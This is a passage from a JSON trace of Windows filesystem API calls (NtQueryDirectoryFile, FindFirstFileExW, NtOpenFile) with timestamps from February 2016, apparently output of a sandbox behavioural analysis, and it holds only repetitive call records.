"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,344", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,374", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,475", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,475", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,565", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,725", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
